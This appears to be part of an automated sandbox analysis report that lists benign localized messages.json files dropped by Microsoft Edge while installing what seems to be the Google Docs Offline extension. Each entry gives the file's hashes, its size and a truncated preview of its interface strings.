                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3264
                                                                                                                                                                  Entropy (8bit):3.586016059431306
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                  MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                  SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                  SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                  SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3235
                                                                                                                                                                  Entropy (8bit):3.6081439490236464
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                  MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                  SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                  SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                  SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3122
                                                                                                                                                                  Entropy (8bit):3.891443295908904
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                  MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                  SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                  SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                  SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1895
                                                                                                                                                                  Entropy (8bit):4.28990403715536
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                  MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                  SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                  SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                  SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1042
                                                                                                                                                                  Entropy (8bit):5.3945675025513955
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                  MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                  SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                  SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                  SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5888_281101463\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

